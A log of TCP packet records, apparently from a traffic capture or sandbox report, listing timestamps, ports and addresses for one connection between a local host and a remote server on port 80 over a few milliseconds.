                                                                                                                                                                  Jan 11, 2025 07:53:53.699942112 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.700058937 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700208902 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700241089 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.700277090 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700417995 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700452089 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.700537920 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700680971 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700721979 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.700742960 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700865030 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.700968981 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.700978994 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701129913 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701239109 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701327085 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701334953 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.701431036 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.701488972 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701589108 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701675892 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701697111 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.701832056 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.701880932 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.701909065 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702028990 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702142000 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.702142954 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702281952 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702282906 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.702415943 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702496052 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702596903 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.702613115 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702744007 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702764034 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.702961922 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.702987909 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703135967 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703211069 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703247070 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.703310013 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703311920 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.703425884 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703480959 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.703550100 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703663111 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703728914 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.703792095 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.703902006 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704014063 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.704015017 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704227924 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704299927 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.704319954 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704361916 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704511881 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704546928 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.704608917 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704674006 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.704751968 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704876900 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704958916 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.704961061 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.705091000 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.705096006 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.705228090 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.705301046 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.705389023 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.705420017 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.705548048 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.705636024 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.705655098 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.705780983 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.705805063 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.705939054 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706006050 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706080914 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.706130028 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706312895 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706356049 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706407070 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.706521034 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706533909 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.706589937 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706708908 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706805944 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.706877947 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.706974030 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707060099 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707134008 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.707189083 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707209110 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.707341909 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707464933 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707573891 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.707587004 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707643986 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707809925 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.707817078 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707896948 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.707988977 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.707999945 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708139896 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708239079 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.708285093 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708342075 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708465099 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708508968 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.708601952 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.708625078 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708698988 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708864927 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.708911896 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.708987951 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709043980 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709165096 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709280014 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709317923 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.709441900 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709547997 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709630966 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709656000 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.709784985 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709785938 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.709916115 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.709980965 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710095882 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710150003 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.710231066 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710303068 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.710336924 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710460901 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710472107 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.710632086 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710707903 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710798025 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710810900 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.710949898 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.710994959 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.711045027 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711148977 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711239100 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.711267948 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711394072 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711500883 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.711508036 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711653948 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711735964 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711745977 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.711878061 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.711941004 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.711970091 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712095022 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712136030 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.712205887 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712321043 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712409019 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.712440014 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712563992 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712578058 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.712711096 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712789059 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.712892056 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.712918043 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713037014 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713110924 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.713140011 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713258982 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713383913 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713423014 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.713494062 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713604927 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713618040 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.713771105 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713838100 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.713851929 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.713984966 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714076042 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714191914 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714363098 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.714369059 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714425087 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714487076 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.714538097 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.714575052 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714660883 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714776039 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.714787960 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714973927 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.714983940 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.715013027 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715154886 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.715157986 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715291023 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715362072 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715441942 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.715473890 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715595007 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715675116 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.715724945 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715831041 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.715909958 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.715940952 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716073990 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716130018 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.716180086 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716296911 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716413021 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716469049 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.716531038 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716614962 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.716648102 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716767073 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.716885090 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.716886044 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717096090 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717122078 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717140913 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.717261076 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.717259884 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717356920 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717468023 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717508078 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.717585087 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717705965 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717818022 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717859030 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.717962980 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.717973948 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.718106031 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718177080 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718272924 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.718288898 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718424082 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718525887 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718533039 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.718667030 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718741894 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.718810081 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718880892 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.718988895 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719000101 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.719125032 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719194889 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.719275951 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719361067 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719484091 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719537020 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.719585896 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719626904 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.719748974 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719825029 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719943047 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.719978094 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.720072031 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720092058 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.720185041 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720302105 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720379114 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.720391035 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720515013 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720588923 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.720619917 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720738888 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720768929 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.720871925 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.720980883 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721045017 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.721101999 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721226931 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721352100 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721355915 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.721486092 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721560001 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721652985 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.721678019 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721750021 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.721813917 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721930027 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.721991062 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.722039938 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722143888 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722317934 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722328901 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.722400904 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722549915 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722676039 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722733974 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722785950 CET4975680192.168.11.20185.125.51.5
                                                                                                                                                                  Jan 11, 2025 07:53:53.722848892 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722965002 CET8049756185.125.51.5192.168.11.20
                                                                                                                                                                  Jan 11, 2025 07:53:53.722978115 CET4975680192.168.11.20185.125.51.5
